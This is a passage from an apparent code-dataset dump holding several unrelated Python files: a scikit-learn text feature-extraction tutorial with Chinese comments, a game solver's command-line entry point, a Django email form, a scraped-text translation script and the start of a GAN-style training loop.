"en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.core.urlresolvers.reverse", "line_number": 34, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects.filter", "line_number": 37, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 37, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard.DoesNotExist", "line_number": 39, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 39, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 41, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects.exclude", "line_number": 43, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 43, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 44, "usage_type": "call"}, {"api_name": "django.views.decorators.vary.vary_on_cookie", "line_number": 23, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard.objects.get", "line_number": 50, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 50, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard.DoesNotExist", "line_number": 51, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 51, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 52, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 62, "usage_type": "call"}, {"api_name": "django.views.decorators.vary.vary_on_cookie", "line_number": 47, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard.objects.get", "line_number": 69, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 69, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard.DoesNotExist", "line_number": 70, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 70, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 71, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 71, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 74, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 74, "usage_type": "call"}, {"api_name": "django.views.decorators.vary.vary_on_cookie", "line_number": 65, "usage_type": "name"}, {"api_name": "django.views.decorators.cache.cache_control", "line_number": 66, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects.filter", "line_number": 80, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects", "line_number": 80, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 80, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 83, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 77, "usage_type": 
"name"}, {"api_name": "bootstrap.forms.BootstrapModelForm", "line_number": 86, "usage_type": "name"}, {"api_name": "traveldash.mine.models.DashboardRoute", "line_number": 88, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 91, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 91, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 92, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 92, "usage_type": "name"}, {"api_name": "traveldash.gtfs.models.Route.objects.between_stops", "line_number": 98, "usage_type": "call"}, {"api_name": "traveldash.gtfs.models.Route.objects", "line_number": 98, "usage_type": "attribute"}, {"api_name": "traveldash.gtfs.models.Route", "line_number": 98, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 99, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 99, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 103, "usage_type": "call"}, {"api_name": "traveldash.gtfs.models.Stop.objects.get", "line_number": 112, "usage_type": "call"}, {"api_name": "traveldash.gtfs.models.Stop.objects", "line_number": 112, "usage_type": "attribute"}, {"api_name": "traveldash.gtfs.models.Stop", "line_number": 112, "usage_type": "name"}, {"api_name": "traveldash.gtfs.models.Stop.DoesNotExist", "line_number": 114, "usage_type": "attribute"}, {"api_name": "traveldash.gtfs.models.Stop", "line_number": 114, "usage_type": "name"}, {"api_name": "django.forms.models.inlineformset_factory", "line_number": 117, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 117, "usage_type": "argument"}, {"api_name": "traveldash.mine.models.DashboardRoute", "line_number": 117, "usage_type": "argument"}, {"api_name": "bootstrap.forms.BootstrapModelForm", "line_number": 120, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 122, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 137, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 137, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 138, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 140, "usage_type": "call"}, {"api_name": "django.contrib.gis.utils.GeoIP", "line_number": 149, "usage_type": "call"}, {"api_name": "traveldash.mine.models.City.objects.distance", "line_number": 151, "usage_type": "call"}, {"api_name": "traveldash.mine.models.City.objects", "line_number": 151, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.City", "line_number": 151, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 154, "usage_type": "call"}, {"api_name": "django.conf.settings.GTFS_STOP_FUSION_TABLE_ID", "line_number": 160, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 160, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 161, "usage_type": "call"}, {"api_name": "traveldash.mine.models.City.objects.get_map_info", "line_number": 161, "usage_type": "call"}, {"api_name": "traveldash.mine.models.City.objects", "line_number": 161, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.City", "line_number": 161, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 163, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 
126, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard.objects.filter", "line_number": 169, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects", "line_number": 169, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 169, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard.DoesNotExist", "line_number": 170, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 170, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 171, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 184, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 184, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 185, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 185, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 187, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 187, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 188, "usage_type": "call"}, {"api_name": "django.conf.settings.GTFS_STOP_FUSION_TABLE_ID", "line_number": 198, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 198, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 199, "usage_type": "call"}, {"api_name": "traveldash.mine.models.City.objects.get_map_info", "line_number": 199, "usage_type": "call"}, {"api_name": "traveldash.mine.models.City.objects", "line_number": 199, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.City", "line_number": 199, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 201, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 166, "usage_type": "name"}, {"api_name": "django.views.generic.DeleteView", "line_number": 204, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 207, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 207, "usage_type": "argument"}, {"api_name": "traveldash.mine.models.Dashboard.objects.filter", "line_number": 212, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects", "line_number": 212, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 212, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 215, "usage_type": "call"}]}
+{"seq_id": "13195459421", "text": "# -*- coding: utf-8 -*-\r\n# @Time : 2021/7/28 11:15\r\n# @Author : ZiruZha\r\n# @File : FeatureExtraction.py\r\n# @Software: PyCharm\r\n\r\n\r\n\"\"\"\r\n特征提取\r\nFeature extraction\r\nThe sklearn.feature_extraction module can be used to extract features in a format supported by machine learning algorithms from datasets consisting of formats such as text and image.\r\n\r\nNote Feature extraction is very different from Feature selection: the former consists in transforming arbitrary data, such as text or images, into numerical features usable for machine learning. The latter is a machine learning technique applied on these features.\r\n\"\"\"\r\n\"\"\"\r\n@article{scikit-learn,\r\n title={Scikit-learn: Machine Learning in {P}ython},\r\n author={Pedregosa, F. and Varoquaux, G. and Gramfort, A. and Michel, V.\r\n and Thirion, B. and Grisel, O. and Blondel, M. and Prettenhofer, P.\r\n and Weiss, R. and Dubourg, V. and Vanderplas, J. and Passos, A. and\r\n Cournapeau, D. and Brucher, M. and Perrot, M. and Duchesnay, E.},\r\n journal={Journal of Machine Learning Research},\r\n volume={12},\r\n pages={2825--2830},\r\n year={2011}\r\n}\r\n\"\"\"\r\n\r\n# 导入数据库\r\nfrom sklearn.datasets import load_iris\r\n# 导入数据库分类函数\r\nfrom sklearn.model_selection import train_test_split\r\n# 导入字典特征提取函数\r\nfrom sklearn.feature_extraction import DictVectorizer\r\n# 导入文本特征提取函数\r\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\r\n# 分词处理\r\nimport jieba\r\n\r\n\r\ndef datasets_demo():\r\n # sklearn数据集使用\r\n # 获取数据集\r\n # 小规模数据用load��大规模数据用fetch\r\n iris = load_iris()\r\n \"\"\"\r\n print(\"鸢尾花数据集:\\n\", iris)\r\n print(\"查看数据集描述:\\n\", iris[\"DESCR\"])\r\n print(\"查看特征值名字:\\n\", iris.feature_names)\r\n print(\"查看特征值:\\n\", iris.data, iris.data.shape)\r\n \"\"\"\r\n\r\n # 数据集划分\r\n x_train, x_test, y_train, y_test = train_test_split(iris.data, iris.target, test_size=0.2, random_state=22)\r\n\r\n return None\r\n\r\n\r\ndef dict_demo():\r\n \"\"\"\r\n 字典特征抽取\r\n :return:\r\n \"\"\"\r\n data = [{'name': 'a', 'age': 1}, {'name': 'b', 'age': 2}, {'name': 'c', 'age': 3}]\r\n # 1. 实例化一个转换器\r\n # DictVectorizer()函数默认返回sparse矩阵(稀疏矩阵)——给出矩阵中非零值的位置与值\r\n # 当类别较多时,sparse矩阵可以节省内存\r\n # 用one-hot编码表示类别\r\n # One-Hot编码,又称一位有效编码。其方法是使用N位状态寄存器来对N个状态进行编码,每个状态都有它独立的寄存器位,并且在任意时候,其中只有一位有效。\r\n transform = DictVectorizer(sparse=False)\r\n # 2. 调用fit_transform()方法,传入字典参数\r\n data_new = transform.fit_transform(data)\r\n print(\"data_new:\\n\", data_new)\r\n print(\"特征名字\\n\", transform.get_feature_names())\r\n return None\r\n\r\n\r\ndef count_demo():\r\n \"\"\"\r\n 英文文本特征抽取:CountVectorizer()\r\n 统计每个单词特征值出现的次数\r\n :return:\r\n \"\"\"\r\n data = [\"To be or not to be\", \"I have a pen\"]\r\n # 1. 实例化一个转换器类\r\n # CountVectorizer()不统计单个字母单词,如I a\r\n # CountVectorizer()只能返回sparse矩阵\r\n # CountVectorizer()无sparse参数,\r\n # 停用词stop_words参数,列表,不统计列表包含的单词\r\n transform = CountVectorizer(stop_words=[\"be\", \"to\"])\r\n # 2. 调用fit_transform()方法\r\n data_new = transform.fit_transform(data)\r\n print(\"data_new:\\n\", data_new.toarray())\r\n print(\"特征名字\\n\", transform.get_feature_names())\r\n return None\r\n\r\n\r\ndef count_chinese_demo():\r\n \"\"\"\r\n 中文文本特征抽取:CountVectorizer()\r\n 统计每个短语特征值出现的次数\r\n 需要进行分字处理\r\n :return:\r\n \"\"\"\r\n data = [\"一二三四五\", \"上山打老虎\"]\r\n # 1. 实例化一个转换器类\r\n # CountVectorizer()只能返回sparse矩阵\r\n # CountVectorizer()无sparse参数,\r\n transform = CountVectorizer()\r\n # 2. 
调用fit_transform()方法\r\n data_new = transform.fit_transform(data)\r\n print(\"data_new:\\n\", data_new.toarray())\r\n print(\"特征名字\\n\", transform.get_feature_names())\r\n return None\r\n\r\n\r\ndef cut_word(text):\r\n \"\"\"\r\n 进行中文分词:”我爱北京天安门“-->”我 爱 北京 天安门“\r\n :param text:\r\n :return:\r\n \"\"\"\r\n return \" \".join(list(jieba.cut(text)))\r\n\r\n\r\ndef count_chinese_demo2():\r\n \"\"\"\r\n 中文文本特征提取,自动分词\r\n :return:\r\n \"\"\"\r\n data = [\r\n \"鲁镇的酒店的格局,是和别处不同的:都是当街一个曲尺形的大柜台,柜里面预备着热水,可以随时温酒。做工的人,傍午傍晚散了工,每每花四文铜钱,买一碗酒,——这是二十多年前的事,现在每碗要涨到十文,——靠柜外站着,热热的喝了休息;倘肯多花一文,便可以买一碟盐煮笋,或者茴香豆,做下酒物了,如果出到十几文,那就能买一样荤菜,但这些顾客,多是短衣帮,大抵没有这样阔绰。只有穿长衫的,才踱进店面隔壁的房子里,要酒要菜,慢慢地坐喝。\",\r\n \"我从十二岁起,便在镇口的咸亨酒店里当伙计,掌柜说,我样子太傻,怕侍候不了长衫主顾,就在外面做点事罢。外面的短衣主顾,虽然容易说话,但唠唠叨叨缠夹不清的也很不少。他们往往要亲眼看着黄酒从坛子里舀出,看过壶子底里有水没有,又亲看将壶子放在热水里,然后放心:在这严重监督下,羼水也很为难。所以过了几天,掌柜又说我干不了这事。幸亏荐头的情面大,辞退不得,便改为专管温酒的一种无聊职务了。\",\r\n \"我从此便整天的站在柜台里,专管我的职务。虽然没有什么失职,但总觉得有些单调,有些无聊。掌柜是一副凶脸孔,主顾也没有好声气,教人活泼不得;只有孔乙己到店,才可以笑几声,所以至今还记得。\"]\r\n # 0. 将中文文本进行分词\r\n data_new = []\r\n for sent in data:\r\n data_new.append(cut_word(sent))\r\n # print(data_new)\r\n # 1. 实例化一个转换器类\r\n # CountVectorizer()只能返回sparse矩阵\r\n # CountVectorizer()无sparse参数,\r\n transform = CountVectorizer()\r\n # 2. 调用fit_transform()方法\r\n data_final = transform.fit_transform(data_new)\r\n print(\"data_new:\\n\", data_final.toarray())\r\n print(\"特征名字\\n\", transform.get_feature_names())\r\n return None\r\n\r\n\r\ndef tfidf_demo():\r\n \"\"\"\r\n 用tfidf函数进行文本特征提取\r\n tfidf: TF-IDF is a statistical measure that evaluates how relevant a word is to a document in a collection of documents.This is done by multiplying two metrics: how many times a word appears in a document, and the inverse document frequency of the word across a set of documents.\r\n :return:\r\n \"\"\"\r\n data = [\r\n \"鲁镇的酒店的格局,是和别处不同的:都是当街一个曲尺形的大柜台,柜里面预备着热水,可以随时温酒。做工的人,傍午傍晚散了工,每每花四文铜钱,买一碗酒,——这是二十多年前的事,现在每碗要涨到十文,——靠柜外站着,热热的喝了休息;倘肯多花一文,便可以买一碟盐煮笋,或者茴香豆,做下酒物了,如果出到十几文,那就能买一样荤菜,但这些顾客,多是短衣帮,大抵没有这样阔绰。只有穿长衫的,才踱进店面隔壁的房子里,要酒要菜,慢慢地坐喝。\",\r\n \"我从十二岁起,便在镇口的咸亨酒店里当伙计,掌柜说,我样子太傻,怕侍候不了长衫主顾,就在外面做点事罢。外面的短衣主顾,虽然容易说话,但唠唠叨叨缠夹不清的也很不少。他们往往要亲眼看着黄酒从坛子里舀出,看过壶子底里有水没有,又亲看将壶子放在热水里,然后放心:在这严重监督下,羼水也很为难。所以过了几天,掌柜又说我干不了这事。幸亏荐头的情面大,辞退不得,便改为专管温酒的一种无聊职务了。\",\r\n \"我从此便整天的站在柜台里,专管我的职务。虽然没有什么失职,但总觉得有些单调,有些无聊。掌柜是一副凶脸孔,主顾也没有好声气,教人活泼不得;只有孔乙己到店,才可以笑几声,所以至今还记得。\"]\r\n # 0. 将中文文本进行分词\r\n data_new = []\r\n for sent in data:\r\n data_new.append(cut_word(sent))\r\n # print(data_new)\r\n # 1. 实例化一个转换器类\r\n transform = TfidfVectorizer()\r\n # 2. 
调用fit_transform()方法\r\n data_final = transform.fit_transform(data_new)\r\n print(\"data_new:\\n\", data_final.toarray())\r\n print(\"特征名字\\n\", transform.get_feature_names())\r\n return None\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # sklearn数据集使用\r\n # datasets_demo()\r\n # 字典特征抽取\r\n # dict_demo()\r\n # 英文本特征抽取:CountVectorizer()\r\n # count_demo()\r\n # 中文本特征抽取:CountVectorizer()\r\n # count_chinese_demo()\r\n # count_chinese_demo2()\r\n # 中文分词\r\n # print(cut_word(\"我爱北京天安门\"))\r\n # tfidf 文本特征提取\r\n tfidf_demo()\r\n", "repo_name": "ZiruZha/Machine-Learning", "sub_path": "Day1/FeatureExtraction.py", "file_name": "FeatureExtraction.py", "file_ext": "py", "file_size_in_byte": 9413, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sklearn.datasets.load_iris", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.DictVectorizer", "line_number": 70, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 90, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 109, "usage_type": "call"}, {"api_name": "jieba.cut", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 143, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 167, "usage_type": "call"}]}
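The tfidf_demo in the record above relies on TfidfVectorizer's default weighting. As a quick reference, this is the smoothed TF-IDF that sklearn documents for those defaults, computed by hand; the helper below is illustrative, not code from the record:

```python
# Hand-computed smoothed TF-IDF matching sklearn's TfidfVectorizer defaults
# (smooth_idf=True, sublinear_tf=False), before the final L2 row normalization.
import math

def tfidf(term_count: int, n_docs: int, doc_freq: int) -> float:
    # idf(t) = ln((1 + n) / (1 + df(t))) + 1   (sklearn's smoothed form)
    idf = math.log((1 + n_docs) / (1 + doc_freq)) + 1
    return term_count * idf

# A term appearing 3 times in one document, present in 2 of 3 documents:
print(tfidf(3, 3, 2))  # ~3.86; TfidfVectorizer then L2-normalizes each row
```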
+{"seq_id": "35937744335", "text": "from enum import Enum\nimport sys\n\nfrom game import Game\n\n\nclass Modes(Enum):\n play = 0\n solve = 1\n check = 2\n\n\nEPSILON = 1e-4\nDEFAULT_PARAMS = (6, 3, 30, 200, 30, 50)\n# The default parameters are arbitrary values\n\n\ndef optimal_gain_gld(N, K, W, L, CR, CT):\n \"\"\"Launch the solve version of the game computing the optimal policy \"\"\"\n env = Game(N, K, W, L, CR, CT)\n\n g_star, _ = env.value_iteration(EPSILON)\n\n return g_star\n\n\ndef play_gld(N, K, W, L, CR, CT):\n \"\"\"Launch the interactive version of the game\"\"\"\n env = Game(N, K, W, L, CR, CT)\n\n env.play_interactive()\n\n\ndef main(argv):\n \"\"\"The default parameters are used if no parameter is specified when calling the main function\"\"\"\n print(\n \"This script can be run using \"\n \"'$ python3 ./main.py [play, solve, check] [N K W L CR CT] [epsilon]'.\\n\"\n )\n\n if len(argv) < 2:\n mode = Modes.solve\n else:\n if argv[1] == \"solve\":\n mode = Modes.solve\n elif argv[1] == \"play\":\n mode = Modes.play\n elif argv[1] == \"check\":\n mode = Modes.check\n else:\n raise ValueError(\n \"First optional command-line argument should be 'solve', 'play' or 'check.\"\n )\n\n if len(argv) >= 8:\n params = tuple(int(arg) for arg in argv[2:8])\n else:\n params = DEFAULT_PARAMS\n\n if len(argv) == 9:\n epsilon = float(argv[8])\n else:\n epsilon = EPSILON\n\n print(\n f\"Running in {mode.name} mode with parameters {params} \"\n + (f\"and epsilon = {epsilon}\"\n if mode in (Modes.solve, Modes.check)\n else \"\")\n )\n\n env = Game(*params)\n\n if mode == Modes.solve:\n g_star, opt_policy = env.value_iteration(epsilon)\n print(f\"Found optimal average gain g* = {g_star}.\")\n\n elif mode == Modes.check:\n g_star, opt_policy = env.value_iteration(epsilon)\n print(f\"Found optimal average gain g* = {g_star}.\")\n env.plot_average_gain(2_000, opt_policy, g_star)\n\n else:\n env.play_interactive()\n\n\nmain(sys.argv)\n", "repo_name": "StrappazzonHugo/GodsLoveDinosaurs", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2086, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "enum.Enum", "line_number": 7, "usage_type": "name"}, {"api_name": "game.Game", "line_number": 20, "usage_type": "call"}, {"api_name": "game.Game", "line_number": 29, "usage_type": "call"}, {"api_name": "game.Game", "line_number": 72, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 87, "usage_type": "attribute"}]}
+{"seq_id": "38876187336", "text": "from django import forms\n\n\nclass EmailLoginForm(forms.Form):\n email = forms.EmailField()\n\n def __init__(self, *args, **kwargs):\n super(forms.Form, self).__init__(*args, **kwargs)\n self.fields['email'].widget.attrs.update({\n 'class': 'input__wide',\n 'autofocus': 'autofocus',\n })\n", "repo_name": "pythonkr/seminar", "sub_path": "sentinel/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 328, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.forms.Form", "line_number": 4, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 4, "usage_type": "name"}, {"api_name": "django.forms.EmailField", "line_number": 5, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 5, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 8, "usage_type": "name"}]}
+{"seq_id": "40686823726", "text": "from textextract.linkextract import Try\nimport os\nimport re\nfrom googletrans import Translator\nimport time\n\n\nobj = Try()\nobj.html_collect()\nf = open(\"htmls.txt\", \"w+\")\nfor element in obj.reformat():\n f.write(element+'\\n')\nf.close()\n\nobj = Try()\nobj.linkextract()\n\nwith open(\"../textextract/unreformat.txt\", \"r+\", encoding='utf-8') as data:\n contents = data.readlines()\n new_code = '[' + ',\\n'.join(contents) + ']'\n f = open(\"../textextract/Output.txt\", \"w\", encoding='utf-8')\n f.write(new_code)\nf.close()\n\nwith open(\"../textextract/Output.txt\", \"r+\", encoding='utf-8') as line:\n collect = line.readlines()\n\n\n\n\n\n\n count = 0\n for line in collect:\n if line[0] == ',' or line[0] == '[' or line[0] == '\\n' or line[0] == ']':\n print(\"\")\n else:\n\n\n with open(\"../textextract/copy.txt\", \"a\", encoding='utf-8') as f:\n f.write(line)\n f.close\n\nif os.path.exists(\"halfcompleted.txt\"):\n open('halfcompleted.txt', 'w').close()\n\nwith open(\"../textextract/copy.txt\", \"r+\", encoding='utf-8') as data:\n contents = data.readlines()\n n = len(contents)\n text = []\n print(n)\n count = 0\n for line in contents:\n if count < n - 1:\n myString = contents[count].replace(\"\\u00A0\", \" \")\n f = open(\"halfcompleted.txt\", \"a\", encoding='utf-8')\n print(re.sub(r\"^\\s+\", \"\", contents[count + 1]), sep='', file=f)\n\n f.close()\n count += 1\n\n\n\n else:\n continue\nprint(text)\n\ndata.close()\n\nif os.path.exists(\"../textextract/ok.txt\"):\n open('../textextract/ok.txt', 'w').close()\nwith open(\"halfcompleted.txt\", \"r+\", encoding='utf-8') as data:\n contents = data.readlines()\n for line in contents:\n f = open(\"../textextract/ok.txt\", \"a\", encoding='utf-8')\n if line == '\\n':\n continue\n print(line.rstrip(\"\\n\"), file=f)\ndata.close\n\nif os.path.exists('../textextract/english.txt'):\n open('../textextract/english.txt', 'w').close()\n\ntranslator = Translator()\nf = open(\"../textextract/ok.txt\", \"r\", encoding='utf-8')\nsample = f.readlines()\ncount = 0\ni = 100\ntranslated = []\n\nfor line in sample:\n with open(\"../textextract/english.txt\", \"a\", encoding='utf-8') as english:\n try:\n if count == i:\n time.sleep(1.1)\n translated = translator.translate(sample[count], dest=\"en\")\n print(translated)\n english.write(translated.text + '\\n')\n english.close()\n i += i\n count += 1\n else:\n translated = translator.translate(sample[count], dest=\"en\")\n time.sleep(0.15)\n print(translated)\n english.write(translated.text + '\\n')\n english.close()\n count += 1\n\n except Exception as e:\n print(e)\n count += 1\n\n\nf.close()\n", "repo_name": "szabolcs4444/szakdolgozat", "sub_path": "Chatbot/textextract/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2936, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "textextract.linkextract.Try", "line_number": 8, "usage_type": "call"}, {"api_name": "textextract.linkextract.Try", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 81, "usage_type": "call"}, {"api_name": 
"os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "googletrans.Translator", "line_number": 84, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 95, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 104, "usage_type": "call"}]}
+{"seq_id": "24064770181", "text": "import time\nfrom options.train_options import TrainOptions\nfrom data.data_loader import CreateDataLoader\nfrom models.models import create_model\nfrom util.visualizer import Visualizer\nfrom collections import OrderedDict\nimport torch\nimport os\nfrom eval import Evalulate\n\n\n'''\nTo resolve the multi-threaded problem.\nif __name__ == '__main__':(for all code)\nor just set num_worker=0\n'''\nif __name__ == '__main__':\n ''' 0611 '''\n opt = TrainOptions().parse()\n data_loader = CreateDataLoader(opt)\n # dataset = data_loader.load_data() # only dataset or dataloader (same one)\n dataset_size = len(data_loader)\n print('#training images = %d' % dataset_size)\n\n model = create_model(opt)\n visualizer = Visualizer(opt)\n total_steps = 0\n hist_error = model.get_errors(opt)\n hist_error = dict(sorted(hist_error.items()))\n visualizer.plot_data = {'train': OrderedDict((k, []) for k in hist_error.keys()),\n 'val': OrderedDict((k, []) for k in hist_error.keys()),\n 'legend': list(hist_error.keys())}\n eval = Evalulate(opt) ##valdation 初始化設定\n if opt.continue_train:\n print(\"---------network is continue train------------\")\n p = os.path.join(model.save_dir, \"history.pth\")\n hist = torch.load(p)\n visualizer.plot_data = hist['plot_data']\n visualizer.metric_data = hist['metric']\n ssim_best = 0\n lpips_best = 1\n for epoch in range(opt.epoch_count, opt.niter + opt.niter_decay + 1):\n epoch_start_time = time.time()\n iter_data_time = time.time()\n epoch_iter = 0\n visualizer.data_error = [0 for _ in hist_error.keys()]\n for i, data in enumerate(data_loader.dataloader):\n iter_start_time = time.time()\n if total_steps % opt.print_freq == 0:\n t_data = iter_start_time - iter_data_time\n visualizer.reset()\n total_steps += opt.batchSize\n epoch_iter += opt.batchSize\n if opt.dataset_mode == 'FLIR':\n model.set_input(data)\n elif opt.dataset_mode == 'KAIST':\n model.set_KAIST_input(data)\n model.optimize_parameters(total_steps=total_steps)\n\n # if total_steps % opt.display_freq == 0:\n # save_result = total_steps % opt.update_html_freq == 0\n # visualizer.display_current_results(model.get_current_visuals(), epoch, save_result)\n\n errors = model.get_current_errors()\n visualizer.add_errors(errors)\n if total_steps % opt.print_freq == 0:\n # errors = model.get_current_errors()\n t = (time.time() - iter_start_time) / opt.batchSize\n visualizer.print_current_errors(epoch, epoch_iter, errors, t, t_data, total_steps,\n len(data_loader.dataloader) * opt.batchSize)\n # if opt.display_id > 0:\n # visualizer.plot_current_errors(epoch, float(epoch_iter) / dataset_size, opt, errors)\n\n if total_steps % opt.save_latest_freq == 0:\n print('saving the latest model (epoch %d, total_steps %d)' %\n (epoch, total_steps))\n model.save('latest')\n\n iter_data_time = time.time()\n del data\n if opt.display_id > 0:\n visualizer.append_error_hist(i + 1)\n visualizer.data_error = [0 for _ in hist_error.keys()]\n train_a_path = model.get_image_paths()[0]\n visualizer.display_current_results(model.get_current_visuals(), epoch, True)\n\n ##這裡開始Valdataion\n ssim, lpips = eval.eval(model, visualizer, opt)\n\n # put behind eval (get val images)\n val_a_path = model.get_image_paths()[0]\n visualizer.display_current_results(model.get_current_visuals(), epoch, True, [train_a_path, val_a_path],\n val=True)\n\n ##tensorboard\n visualizer.plot_current_errors(epoch)\n ##tensorbard-evaluation\n visualizer.plot_current_metrics(ssim, lpips, epoch)\n if epoch % opt.save_epoch_freq == 0:\n 
